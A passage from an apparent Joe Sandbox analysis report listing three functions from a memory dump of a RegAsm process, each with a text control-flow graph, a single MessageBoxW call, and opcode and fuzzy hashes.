                                                                        • Opcode Fuzzy Hash: 26d0e2221b6603de15cbe852792cf400e437e980dfac219ac73475ed3dd0eaf2
                                                                        • Instruction Fuzzy Hash: 75211AB19002499FDB14CF99C844BEEFBF4EB88720F148429D558A7250D7789945CFA5
                                                                        Function 00CF4CEC Relevance: 1.6, APIs: 1, Instructions: 60windowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 476 cf4cec-cf8743 478 cf874b-cf874f 476->478 479 cf8745-cf8748 476->479 480 cf8757-cf878a MessageBoxW 478->480 481 cf8751-cf8754 478->481 479->478 482 cf878c-cf8792 480->482 483 cf8793-cf87a7 480->483 481->480 482->483
                                                                        APIs
                                                                        • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,00CF52D5,?,?,?), ref: 00CF877D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.3704854503.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_cf0000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Message
                                                                        • String ID:
                                                                        • API String ID: 2030045667-0
                                                                        • Opcode ID: f897661aad370ac51359f40d237bb1d38e741ae43a38dd870d04262bf7526ee6
                                                                        • Instruction ID: 82588457363bc91909973001e20e8d715dfb5cb84386eb2acae3eed5a09689fd
                                                                        • Opcode Fuzzy Hash: f897661aad370ac51359f40d237bb1d38e741ae43a38dd870d04262bf7526ee6
                                                                        • Instruction Fuzzy Hash: 4D2107B69003499FDB10DF9AD884BDEFBF4FB48314F20842EE559A7600C774A948CBA5
                                                                        Function 00CF86F8 Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 485 cf86f8-cf8743 486 cf874b-cf874f 485->486 487 cf8745-cf8748 485->487 488 cf8757-cf878a MessageBoxW 486->488 489 cf8751-cf8754 486->489 487->486 490 cf878c-cf8792 488->490 491 cf8793-cf87a7 488->491 489->488 490->491
                                                                        APIs
                                                                        • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,00CF52D5,?,?,?), ref: 00CF877D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.3704854503.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_cf0000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Message
                                                                        • String ID:
                                                                        • API String ID: 2030045667-0
                                                                        • Opcode ID: 43e0ec9552aea663ed5f3587151da39dabbfa188ecb4e936b1030caa33a92c64
                                                                        • Instruction ID: 7197728809bb0335144e6cf95ffed7f6543a549932e62058fca1c7993ee50ddf
                                                                        • Opcode Fuzzy Hash: 43e0ec9552aea663ed5f3587151da39dabbfa188ecb4e936b1030caa33a92c64
                                                                        • Instruction Fuzzy Hash: 112118B59013499FCB10DF99D884ADEFBB4FB48350F10842EE559A7600D7749944CFA1
                                                                        Function 00CF87B0 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 493 cf87b0-cf87b1 494 cf876b-cf878a MessageBoxW 493->494 495 cf87b3-cf87c7 493->495 496 cf878c-cf8792 494->496 497 cf8793-cf87a7 494->497 499 cf87c9 495->499 500 cf8801 495->500 496->497 502 cf87de-cf87e3 499->502 503 cf87ec-cf87f1 499->503 504 cf87fa-cf87ff 499->504 505 cf87d7-cf87dc 499->505 506 cf87e5-cf87ea 499->506 507 cf87f3-cf87f8 499->507 508 cf87d0-cf87d5 499->508 501 cf8806-cf8807 500->501 502->501 503->501 504->501 505->501 506->501 507->501 508->501
                                                                        APIs
                                                                        • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,00CF52D5,?,?,?), ref: 00CF877D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.3704854503.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_cf0000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Message
                                                                        • String ID:
                                                                        • API String ID: 2030045667-0
                                                                        • Opcode ID: 5e7ca2688919fd45b7cc018c41f18f50ab0b0921bd9ef584044fddb2e2d91a27
                                                                        • Instruction ID: aec0c5a570bc32a260d13b58ca21ff2d8807ecdd4405d817f386ebaf4f23d565
                                                                        • Opcode Fuzzy Hash: 5e7ca2688919fd45b7cc018c41f18f50ab0b0921bd9ef584044fddb2e2d91a27
                                                                        • Instruction Fuzzy Hash: F501B17190C348CFDB519B59E9003F87BA0EB11354F64806BE24AA72D2DA39988CC753